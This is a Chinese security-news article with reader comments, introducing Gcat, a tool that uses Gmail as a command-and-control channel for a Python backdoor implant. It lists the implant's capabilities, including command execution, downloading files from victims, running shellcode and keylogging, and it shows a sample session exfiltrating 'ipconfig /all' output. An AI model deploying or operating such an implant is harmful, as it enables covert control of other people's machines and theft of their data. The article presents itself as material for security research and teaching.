巧用Gmail做你的C&C服务器
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
在渗透测试中,C&C(命令与控制)服务器一直是个关键的问题……Gmail或许是一个不错的选择?那么这款名为Gcat的工具就得出动了。
操作步骤
为了做这个工作,你需要做好下面准备
一个Gmail账号(别用你的个人账号哦……你懂的)
在安全设置中,开启"Allow less secure apps"
repo包含两个文件:
gcat.py 用于命令执行 implant.py 用于后门部署
在上述两个文件中,编辑gmail_user and gmail_pwd为你自己的
使用
Gcat工具
optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -id ID Client to target -jobid JOBID Job id to retrieve -list List available clients -info Retrieve info on specified client
命令
Commands to execute on an implant -cmd CMD Execute a system command -download PATH Download a file from a clients system -exec-shellcode FILE Execute supplied shellcode on a client -screenshot Take a screenshot -lock-screen Lock the clients screen -force-checkin Force a check in -start-keylogger Start keylogger -stop-keylogger Stop keylogger
部署后门后,用以下命令测试一下:
#~ python gcat.py -list f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86 90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
输出的是UUID,用于标识每个操作系统
操作实例
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all' [*] Command sent successfully with jobid: SH3C4gv Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command Lets get the results! #~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)' JOBID: SH3C4gv FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py' CMD: 'ipconfig /all' Windows IP Configuration Host Name . . . . . . . . . . . . : unknown-2d44b52 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No -- SNIP --
Gcat下载
*本文作者:fu4k,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)
这些评论亮了
-
乍一看是一个好方法:一般firewall都会对gmail放行 (天朝的除外 :=)),而且gmail强制https,这样IDS也看不见里面的内容。
但是问题是google也有自己的anti-bot机制。从google来看,很明显的可以发现这个帐号的异常:频繁的大量的从不同的IP登陆,不同的Geo Location. 用一个统计规测就可以把这个帐号block掉,或者要求输入captcha。 -
上七下Google都连不上。。 -
MrtnC&C明明是我西屋的命令与征服! -
STAY李成干掉GFW,啥事都解决了~
特别推荐
关注我们 分享每日精选文章
活动预告
-
11月
FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气已结束 -
10月
【16课时-连载中】挖掘CVE不是梦(系列课程2)已结束 -
10月
【首节课仅需1元】挖掘CVE不是梦已结束 -
9月
【已结束】自炼神兵之自动化批量刷SRC已结束
已有 22 条评论
好厉害
乍一看是一个好方法:一般firewall都会对gmail放行 (天朝的除外 :=)),而且gmail强制https,这样IDS也看不见里面的内容。
但是问题是google也有自己的anti-bot机制。从google来看,很明显的可以发现这个帐号的异常:频繁的大量的从不同的IP登陆,不同的Geo Location. 用一个统计规测就可以把这个帐号block掉,或者要求输入captcha。
@nickchang 都不必大量,两次的登陆IP不一样,就让你验证,够麻烦的,使用代理的时候就明细碰到这个问题
@ witwall 登录都不用,现在注册个GMAIL账号就已经够麻烦了
@ 123 不麻烦啊,验证邮箱+手机号,最多3分钟
@ 紫溪 亲,难道用实名手机号注册啊?
@ 紫溪 牛逼 实名手机
@ 紫溪 首先是得拥有一个未实名认证的手机号
@ nickchang 在安全设置中,开启"Allow less secure apps"
@ Pandas 开启"Allow less secure apps"并不会关闭google的anti-bot机制。这个选项只不过是允许用户通过第三方软件发送gmail密码罢了。请参见 http://security.stackexchange.com/questions/66025/what-are-the-dangers-of-allowing-less-secure-apps-to-access-my-google-account
Google都连不上。。
C&C明明是我西屋的命令与征服!
干掉GFW,啥事都解决了~
@ STAY李成 说的好
如何打开gmail呢?
首先,你得会翻墙
你要能破解别人的协议,不用登录就能通信,那才叫NB,
@ 高大上 这个想想就好
学习了一下
这个办法肯定不是国人写的
跟那个模拟gtalk的xmpp协议没啥区别,那个还具备通用性,你这个google反垃圾邮件系统很容易就挡掉了
ps:这个是06年以前的MM玩法,过时了
干掉GFW,啥事都解决了~